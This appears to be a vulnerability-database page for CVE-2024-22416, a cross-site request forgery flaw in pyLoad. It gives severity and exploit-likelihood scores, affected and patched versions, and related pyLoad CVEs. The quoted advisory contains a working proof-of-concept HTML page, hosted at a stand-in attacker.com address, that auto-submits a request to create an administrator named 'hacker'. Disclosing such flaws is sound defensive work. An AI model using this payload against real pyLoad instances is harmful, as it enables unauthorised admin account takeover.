CVE-2024-22416Critical· 9.6▾ AbyssalPoC availableCross-Site Request Forgery on any API call in pyLoad may lead to admin privilege escalation
▾ Abyssal zone — Critical with a public exploit or in-the-wild use
impact 52.8 · likelihood 0.2 · exploitation 12
A public proof-of-concept already exists for this vulnerability — see Exploit availability below.
Public exploit / PoC code seen in 1 source. Availability, not in-the-wild use.
Exploit-prediction probability, daily snapshots since Sep 12.
Disclosure to exploitation, from the record and what we observed since indexing it.
Disclosed via OSV
Last analysed / modified upstream
0.9%
1 GitHub repo (last check)
The pyload API allows any API call to be made using GET requests. Since the session cookie is not set to SameSite: strict, this opens the library up to severe attack possibilities via a Cross-Site Request Forgery (CSRF) attack. This proof of concept shows how an unauthenticated user could trick the administrator's browser into creating a new admin user.
We host the following HTML file on an attacker-controlled server.
<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<form action="http://localhost:8000/api/add_user/%22hacker%22,%22hacker%22">
<input type="submit" value="Submit request" />
</form>
<script>
history.pushState('', '', '/');
document.forms[0].submit();
</script>
</body>
</html>
If we now trick an administrator into visiting our malicious page at https://attacker.com/CSRF.html, we see that their browser will make a request to /api/add_user/%22hacker%22,%22hacker%22, adding a new administrator to the pyload application.

The attacker can now authenticate as this newly created administrator user with the username hacker and password hacker.

Any API call can be made via a CSRF attack by an unauthenticated user.
pyload-ng < 0.5.0b3.dev78Upgrade to a patched release:
pyload-ng 0.5.0b3.dev78Connected by shared product, vendor, weakness, or advisory.
CVE-2024-21644High· 7.5pyload Unauthenticated Flask Configuration Leakage vulnerability
CVE-2024-21645Medium· 5.3pyload Log Injection vulnerability
CVE-2025-54802Critical· 9.8pyLoad CNL Blueprint allows Path Traversal through `dlc_path` which leads to Remote Code Execution (RCE)
CVE-2026-45306Medium· 6.5pyLoad Has Incomplete Fix for CVE-2026-33509 -storage_folder Bypass via Session Directory in pyLoad
CVE-2026-35463High· 8.8pyLoad: Improper Neutralization of Special Elements used in an OS Command
CVE-2026-40071Medium· 5.4pyload-ng has a WebUI JSON permission mismatch that lets ADD/DELETE users invoke MODIFY-only actions